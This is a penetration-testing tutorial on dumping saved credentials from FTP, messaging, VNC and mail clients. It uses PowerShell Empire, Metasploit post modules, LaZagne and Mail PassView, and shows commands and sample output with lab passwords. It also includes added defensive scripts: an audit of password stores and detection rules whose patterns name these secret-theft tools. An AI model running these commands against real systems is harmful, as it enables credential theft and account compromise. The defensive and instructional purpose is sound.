Credential Dumping Techniques for Penetration Testing: Tips & Techniques

Table of contents
- 1. PowerShell Empire: SessionGopher Module
- 2. CoreFTP: Metasploit Framework
- 3. FTP Navigator: LaZagne
- 4. FTP Navigator: Metasploit Framework
- 5. FileZilla: Metasploit Framework
- 6. Pidgin: Metasploit Framework
- 7. PSI: LaZagne
- 8. VNC: Metasploit Framework
- 9. WinSCP: LaZagne
- 10. WinSCP: Metasploit Framework
- 11. Email Credentials: Mail PassView
- Conclusion

Credential dumping is a critical technique in penetration testing, allowing security professionals to retrieve stored credentials from various applications on a target system. This guide explores multiple methods to extract credentials using tools like PowerShell Empire, the Metasploit Framework, LaZagne, and Nirsoft's Mail PassView, with practical commands and steps for each. Always ensure you have explicit permission to perform these actions, as unauthorized access is illegal.
1. PowerShell Empire: SessionGopher Module
PowerShell Empire is a powerful post-exploitation framework that includes the SessionGopher module, designed to automatically retrieve credentials from applications like PuTTY, WinSCP, FileZilla, and Microsoft Remote Desktop (RDP). This module simplifies the process by scanning the system and extracting saved credentials without manual intervention.
Steps:
- Establish a session in PowerShell Empire.
- Load the SessionGopher module: `usemodule credentials/sessiongopher`
- Execute the module: `execute`

Example output (the module can retrieve credentials such as the following):
```text
FileZilla: Host: 192.168.152.133, User: user, Password: 123, Port: 21, Protocol: FTP
PuTTY: Session: user, Host: 192.168.152.133, User: user, Port: 22
WinSCP: Session: user, Host: 192.168.152.133, User: user, Password: 123
RDP: Host: 192.168.152.129, User: user
```
2. CoreFTP: Metasploit Framework
CoreFTP is a Windows-based FTP client used for file transfers over the FTP protocol. Metasploit provides a post-exploitation module to extract credentials stored in the Windows registry at HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites.
Steps:
- Gain a Metasploit session on the target system.
- Load the CoreFTP credentials module: `use post/windows/gather/credentials/coreftp`
- Set the session ID: `set session 1`
- Run the module: `exploit`

Example output:
```text
[*] Looking at Key HKU\S-1-5-21-3798055023-10338230357-2023829303-1001
[*] Host: 192.168.152.133 Port: 21 User: User Password: 123
[*] Post module execution completed
```
3. FTP Navigator: LaZagne
FTP Navigator is an FTP client that facilitates file transfers, edits, and directory synchronization. The LaZagne tool can extract credentials stored by FTP Navigator.
Steps:
- Download and run LaZagne on the target system: `lazagne.exe all`
- Look for the FTP Navigator section in the output to retrieve the stored credentials.
4. FTP Navigator: Metasploit Framework
Metasploit also offers a module to dump FTP Navigator credentials, making it a versatile option for penetration testers.
Steps:
- Load the FTP Navigator credentials module: `use post/windows/gather/credentials/ftpnavigator`
- Set the session ID: `set session 1`
- Execute the module: `exploit`
5. FileZilla: Metasploit Framework
FileZilla is a popular open-source FTP client compatible with Windows, Linux, and macOS. Metasploit can extract credentials stored in FileZilla's configuration files, typically located at C:\Users\User\AppData\Roaming\FileZilla.
Steps:
- Load the FileZilla credentials module: `use post/multi/gather/filezilla_client_cred`
- Set the session ID: `set session 1`
- Run the module: `exploit`

Example output:
```text
[*] Checking for FileZilla directory in: C:\Users\User\AppData\Roaming
[*] Found C:\Users\User\AppData\Roaming\FileZilla
[*] Reading and parsing configuration files
```
6. Pidgin: Metasploit Framework
Pidgin is a multi-protocol instant messaging client that stores credentials in C:\Users\User\AppData\Roaming\.purple\accounts.xml. Metasploit can extract these credentials for protocols like AIM, Jabber, IRC, and ICQ.
Steps:
- Load the Pidgin credentials module: `use post/multi/gather/pidgin_cred`
- Set the session ID: `set session 1`
- Execute the module: `exploit`

Example output:
```text
[*] Checking for Pidgin profile in C:\Users\User\AppData\Roaming
[*] Found C:\Users\User\AppData\Roaming\.purple
[*] Reading accounts.xml file
[*] Collected the following credentials:
[*] Server: slogin.oscar.aol.com:5190 Protocol: prpl-aim Username: user123 Password: pass123
[*] Server: unknown2:5222 Protocol: prpl-jabber Username: fnfjkfdssnf@gmail.com Password: pass123
```
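The FileZilla and Pidgin sections above both come down to the same weakness: the client writes its saved passwords into an XML file in the user's roaming profile, and any process running as that user can read them. The following is an added audit script (not part of the original post, and not code from Metasploit, FileZilla or Pidgin) that a defender can run against those two files to find out which entries would be recovered by the modules shown, without copying the secrets out. It assumes the `sitemanager.xml` layout (a `<Pass encoding="base64">` child under each `<Server>`) and the `accounts.xml` layout (a `<password>` child under each inner `<account>`); the two sample files embedded below are constructed for the example and modelled on the entries in the module output.

```python
from __future__ import annotations
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample files (not real captures), modelled on the entries shown above.
# Real files: %APPDATA%\FileZilla\sitemanager.xml and %APPDATA%\.purple\accounts.xml.
SAMPLE_FILEZILLA = """<FileZilla3 version="3.50.0" platform="windows">
  <Servers>
    <Server>
      <Host>192.168.152.133</Host><Port>21</Port><Protocol>0</Protocol>
      <User>user</User>
      <Pass encoding="base64">MTIz</Pass>
      <Logontype>1</Logontype><Name>lab ftp</Name>
    </Server>
    <Server>
      <Host>files.example.test</Host><Port>22</Port><Protocol>1</Protocol>
      <User>deploy</User>
      <Logontype>2</Logontype><Name>ask each time</Name>
    </Server>
  </Servers>
</FileZilla3>"""

SAMPLE_PIDGIN = """<account version='1.0'>
  <account>
    <protocol>prpl-aim</protocol><name>user123</name>
    <password>pass123</password>
  </account>
  <account>
    <protocol>prpl-jabber</protocol><name>fnfjkfdssnf@gmail.com</name>
    <password>pass123</password>
  </account>
  <account>
    <protocol>prpl-irc</protocol><name>ops@irc.example.test</name>
  </account>
</account>"""


@dataclass
class Finding:
    app: str        # application that owns the credential store
    account: str    # identifier only; the secret itself is never copied out
    stored: bool    # True if a password is saved on disk
    encoding: str   # "plaintext", "base64" (reversible, not protected) or "none"


def audit_filezilla(xml_text: str) -> list[Finding]:
    """Walk every <Server> in sitemanager.xml and note whether a <Pass> is saved."""
    findings = []
    for server in ET.fromstring(xml_text).iter("Server"):
        account = f"{server.findtext('User', '')}@{server.findtext('Host', '')}"
        pw = server.find("Pass")
        if pw is None or not (pw.text or "").strip():
            findings.append(Finding("FileZilla", account, False, "none"))
        else:
            enc = "base64" if pw.get("encoding") == "base64" else "plaintext"
            findings.append(Finding("FileZilla", account, True, enc))
    return findings


def audit_pidgin(xml_text: str) -> list[Finding]:
    """Walk the <account> children of accounts.xml (the root element is also <account>)."""
    findings = []
    for acct in ET.fromstring(xml_text).findall("account"):
        account = f"{acct.findtext('name', '')} ({acct.findtext('protocol', '')})"
        saved = bool((acct.findtext("password") or "").strip())
        findings.append(Finding("Pidgin", account, saved, "plaintext" if saved else "none"))
    return findings


def at_risk_counts(filezilla_xml: str, pidgin_xml: str) -> dict[str, int]:
    """Entries per application that a dumping module would recover (any saved password)."""
    counts = {"FileZilla": 0, "Pidgin": 0}
    for f in audit_filezilla(filezilla_xml) + audit_pidgin(pidgin_xml):
        if f.stored:
            counts[f.app] += 1
    return counts


# Hardening advice per store: FileZilla 3.26 and later offer a master password,
# and Pidgin has a per-account "Remember password" option that can be unticked.
REMEDIATION = {
    "FileZilla": "set a master password (Edit > Settings > Passwords) or use the 'Ask for password' logon type",
    "Pidgin": "untick 'Remember password' on the account so no secret is written to accounts.xml",
}


def report(filezilla_xml: str, pidgin_xml: str) -> list[str]:
    """Human-readable audit lines: one per entry, then a remediation line per exposed app."""
    lines = []
    for f in audit_filezilla(filezilla_xml) + audit_pidgin(pidgin_xml):
        status = f"saved ({f.encoding})" if f.stored else "not saved"
        lines.append(f"{f.app}: {f.account}: password {status}")
    for app, n in at_risk_counts(filezilla_xml, pidgin_xml).items():
        if n:
            lines.append(f"{app}: {n} exposed entr{'y' if n == 1 else 'ies'}; {REMEDIATION[app]}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_FILEZILLA, SAMPLE_PIDGIN)))
```

The base64 encoding FileZilla applies is not protection, which is why the audit treats it the same as plaintext; the only entries that survive a dump are the ones where no password is saved at all.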
7. PSI: LaZagne
PSI is a customizable instant messaging client that operates over the XMPP network and supports file transfers. LaZagne can extract PSI credentials efficiently.
Steps:
- Run LaZagne to dump all credentials: `lazagne.exe all`
- Check the output for PSI credentials.
8. VNC: Metasploit Framework
VNC (Virtual Network Computing) is a remote access tool whose server stores the password used to authenticate remote sessions on the host. Metasploit can retrieve these credentials.
Steps:
- Load the VNC credentials module: `use post/windows/gather/credentials/vnc`
- Set the session ID: `set session 2`
- Execute the module: `exploit`
9. WinSCP: LaZagne
WinSCP is a file transfer client for Windows built on the SSH protocol (SFTP and SCP), featuring a graphical interface and remote editing capabilities. LaZagne can extract its saved credentials.
Steps:
- Run LaZagne to dump credentials: `lazagne.exe all`
- Look for WinSCP credentials in the output.
10. WinSCP: Metasploit Framework
Metasploit also provides a module to extract WinSCP credentials.
Steps:
- Load the WinSCP credentials module: `use post/windows/gather/credentials/winscp`
- Set the session ID: `set session 1`
- Execute the module: `exploit`
11. Email Credentials: Mail PassView
Mail PassView, developed by Nirsoft, is a tool designed for internal penetration testing to retrieve email credentials stored on a system.
Steps:
- Download Mail PassView from the official Nirsoft website.
- Launch the tool to display the stored email credentials.
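Every technique on this page leaves a trace on the endpoint: LaZagne is launched from a command line (`lazagne.exe all`), the Empire module runs the SessionGopher PowerShell script, and Mail PassView is a standalone executable. The following is an added detection example from the defender's side (not part of the original post and not code from any of the tools named); it runs three simple rules over constructed process-creation and PowerShell script-block records. The record format is a simplification assumed for the example, the LaZagne module names other than `all` (`browsers`, `mails`, `sysadmin`, `windows`) are a subset of the tool's real module list, `Invoke-SessionGopher` is the function the SessionGopher script exports, and `mailpv.exe` is the file name Nirsoft ships Mail PassView under.

```python
from __future__ import annotations
import re

# Constructed sample telemetry (not real logs), reduced to the fields the rules use:
# process-creation events carry image and command_line, script-block events carry script_text.
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS01", "user": "CORP\\user",
     "image": r"C:\Users\User\Downloads\lazagne.exe",
     "command_line": "lazagne.exe all"},
    {"type": "script_block", "host": "WS01", "user": "CORP\\user",
     "script_text": "Invoke-SessionGopher -Thorough"},
    {"type": "process_create", "host": "WS02", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"type": "process_create", "host": "WS03", "user": "CORP\\bob",
     "image": r"C:\Temp\mailpv.exe",
     "command_line": "mailpv.exe /stext C:\\Temp\\out.txt"},
]

# Each rule: name, event type it applies to, field to inspect, pattern, severity.
# Command-line and file-name rules are cheap but evadable by renaming the binary;
# the script-block rule keys on the script content itself, so a renamed .ps1 still fires.
RULES = [
    ("lazagne_cli", "process_create", "command_line",
     re.compile(r"\blazagne(\.exe)?\s+(all|browsers|mails|sysadmin|windows)\b", re.I), "high"),
    ("sessiongopher_script", "script_block", "script_text",
     re.compile(r"Invoke-SessionGopher|SessionGopher\.ps1", re.I), "high"),
    ("mail_passview", "process_create", "image",
     re.compile(r"(^|\\)mailpv\.exe$", re.I), "medium"),
]


def detect(events: list[dict]) -> list[dict]:
    """Return one alert per (event, rule) match, in event order, with the matched text as evidence."""
    alerts = []
    for ev in events:
        for name, ev_type, field, pattern, severity in RULES:
            if ev.get("type") != ev_type:
                continue
            value = ev.get(field, "")
            m = pattern.search(value)
            if m:
                alerts.append({"rule": name, "severity": severity, "host": ev["host"],
                               "user": ev["user"], "evidence": m.group(0)})
    return alerts


def summarize(alerts: list[dict]) -> dict[str, int]:
    """Alert counts per host, useful for prioritising which workstation to triage first."""
    counts: dict[str, int] = {}
    for a in alerts:
        counts[a["host"]] = counts.get(a["host"], 0) + 1
    return counts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['rule']} on {a['host']} as {a['user']}: {a['evidence']}")
    print(summarize(detect(SAMPLE_EVENTS)))
```

The script-block rule needs PowerShell script block logging enabled on the endpoint to have anything to match; without it, the Empire module is only visible through the process tree. Treat these rules as starting points rather than a complete detection, since any of the three tools can be recompiled or renamed.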
Conclusion
Credential dumping is a powerful technique for penetration testers to uncover stored credentials in various applications. Tools like PowerShell Empire, Metasploit, LaZagne, and Mail PassView streamline the process, targeting applications such as CoreFTP, FileZilla, WinSCP, PuTTY, Pidgin, PSI, VNC, and email clients. By following the steps outlined above, you can efficiently extract credentials during authorized testing. Always ensure you have permission to perform these actions to stay within legal and ethical boundaries.
For further learning, explore resources like Hacking Articles or join training programs in ethical hacking, network pentesting, or bug bounties to enhance your skills.
Written by Cyb3rSec